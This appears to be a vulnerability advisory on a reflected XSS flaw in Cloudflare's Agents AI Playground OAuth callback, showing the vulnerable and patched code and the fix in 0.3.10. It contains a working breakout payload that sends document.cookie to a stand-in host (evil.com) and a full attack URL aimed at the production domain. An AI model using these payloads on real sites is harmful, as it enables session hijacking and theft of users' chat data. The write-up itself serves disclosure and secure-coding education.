Feb 14, 2026
Reflected XSS in Cloudflare Agents AI Playground (< 0.3.10) via OAuth callbacks. Developers used `JSON.stringify` inside a `<script>` block, assuming it was safe. It wasn't. Attackers can inject `</script>` to break out and steal chat logs or hijack MCP sessions.
A classic Reflected Cross-Site Scripting (XSS) vulnerability found in the Cloudflare Agents AI Playground. The flaw stems from a misunderstanding of how browsers parse script tags within inline HTML, allowing attackers to break out of a JSON string context and execute arbitrary JavaScript. This exposes sensitive LLM chat history and connected Model Context Protocol (MCP) servers to unauthorized access.
Everyone is rushing to build AI Agents right now. It's the new gold rush. Cloudflare joined the party with their Agents SDK, designed to connect Large Language Models (LLMs) to tools via the Model Context Protocol (MCP). To demonstrate this power, they shipped the AI Playground, a nifty web app where developers can test their agents and OAuth flows.
But here's the thing about OAuth: it's a messy dance of redirects, callbacks, and state parameters. When things go wrong—like a user denying access—the provider kicks the user back to the application with an error message. Ideally, the app handles this gracefully.
In the case of the AI Playground, the developers tried to be helpful. They wanted to pop up an alert box telling you exactly why authentication failed. Unfortunately, in their attempt to be helpful, they handed attackers a loaded gun pointed directly at the user's session. It's a classic tale of "functionality over security" meeting "misunderstood browser mechanics."
The vulnerability lies in a dangerous misconception that has plagued web development for decades: the belief that `JSON.stringify()` is a security function. It is not.

In the vulnerable code, the application receives an `error_description` query parameter from the URL. To display this to the user, the server constructs an HTML response containing an inline `<script>` block. The developer logic went like this: "I'll take the untrusted input, wrap it in `JSON.stringify()`, and that will escape all the quotes. Therefore, it's safe to drop into a JavaScript variable."

Wrong.

While `JSON.stringify()` does escape quotes (`"` becomes `\"`), it does not escape HTML-significant characters like `<` or `/`. When a browser parses HTML, it doesn't apply JavaScript syntax rules while tokenizing tags. If the HTML parser sees the sequence `</script>`, it immediately closes the script block, regardless of whether that sequence sits inside a JavaScript string literal. This quirk of the tokenizer's script-data state lets an attacker terminate the developer's script prematurely and start their own.
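A quick Node check makes the gap concrete (illustrative, not from the original writeup):

```javascript
const payload = '</script><script>alert(1)</script>';

// JSON.stringify adds surrounding quotes and escapes " and \ ...
console.log(JSON.stringify('say "hi"')); // quotes ARE escaped: "say \"hi\""

// ...but < and / pass through untouched, so the HTML parser still
// sees a literal closing tag inside the "escaped" string.
const encoded = JSON.stringify(payload);
console.log(encoded.includes('</script>')); // true
```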
Let's look at the crime scene in `site/ai-playground/src/server.ts`. This is the `customHandler` responsible for processing the OAuth callback.
The Vulnerable Code:

```typescript
customHandler: (result: MCPClientOAuthResult) => {
  // ... success handling omitted ...
  // VULNERABLE: result.authError comes from URL query params (?error_description=...)
  const safeError = JSON.stringify(result.authError || "Unknown error");
  // The injection happens here, inside the template literal
  return new Response(
    `<script>alert('Authentication failed: ' + ${safeError}); window.close();</script>`,
    { headers: { "content-type": "text/html" }, status: 200 }
  );
}
```

Do you see it? The `${safeError}` is interpolated directly into the HTML string. If `safeError` contains `</script>`, the browser sees this:
```html
<script>alert('Authentication failed: ' + "</script> ...
```

The browser says "Okay, script over!" and dumps the rest of the payload into the DOM as raw HTML. If the attacker follows that closing tag with a new opening `<script>` tag, they own the execution flow.
Exploiting this is trivial. We just need to craft a URL that closes the developer's script tag and opens our own. The target is the error_description parameter on the callback endpoint.
The Payload:

```
</script><script>fetch('https://evil.com/steal?c='+document.cookie)</script>
```

The Attack URL:
```
https://ai-playground.cloudflare.com/callback
  ?error=access_denied
  &error_description=</script><script>alert(document.domain)</script>
  &state=VALID_STATE
```

(The `error_description` value is shown decoded for readability; in a real link it would be percent-encoded.) When the victim clicks this link (perhaps disguised in a phishing email or a "Try my new AI Agent" button), the server responds with:
```html
<script>alert('Authentication failed: ' + "</script><script>alert(document.domain)</script>"); window.close();</script>
```

Execution Flow:

1. The HTML parser reaches the injected `</script>` inside the string literal. Script 1 terminated.
2. The parser immediately opens `<script>alert(document.domain)</script>`. Script 2 executed.
3. The attacker's JavaScript now runs on the origin of `ai-playground.cloudflare.com`.

So, we popped an alert box. Who cares? In the context of an AI Playground, the stakes are actually quite high. This isn't just a brochure site; it's a stateful application holding sensitive data.
Cloudflare's fix in version 0.3.10 was simple and effective: they stopped reflecting the error message entirely. Instead of trying to sanitize the input (which is hard to do right in this context without a heavy library), they simply removed the dynamic content from the response.
The Patched Code:

```typescript
// PATCHED: No more dynamic interpolation
return new Response("<script>window.close();</script>", {
  headers: { "content-type": "text/html" },
});
```

If the authentication fails, the window simply closes. The error handling was moved to the parent window or handled via safe state management, where React's automatic escaping protects the user.
Lesson for Developers: If you find yourself writing strings into a `<script>` tag manually, stop. You are almost certainly doing it wrong. Pass data via data attributes, CSP-safe JSON script blocks, or, better yet, don't reflect user input in script contexts at all.
CVSS Vector: `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N`

| Product | Affected Versions | Fixed Version |
|---|---|---|
| Cloudflare Agents (Cloudflare) | < 0.3.10 | 0.3.10 |
| Attribute | Detail |
|---|---|
| Vulnerability Type | Reflected Cross-Site Scripting (XSS) |
| CWE ID | CWE-79 |
| CVSS Score | 6.2 (Medium) |
| Attack Vector | Network (Reflected) |
| Exploit Status | PoC Available |
| Impact | Session Hijacking, Data Exfiltration |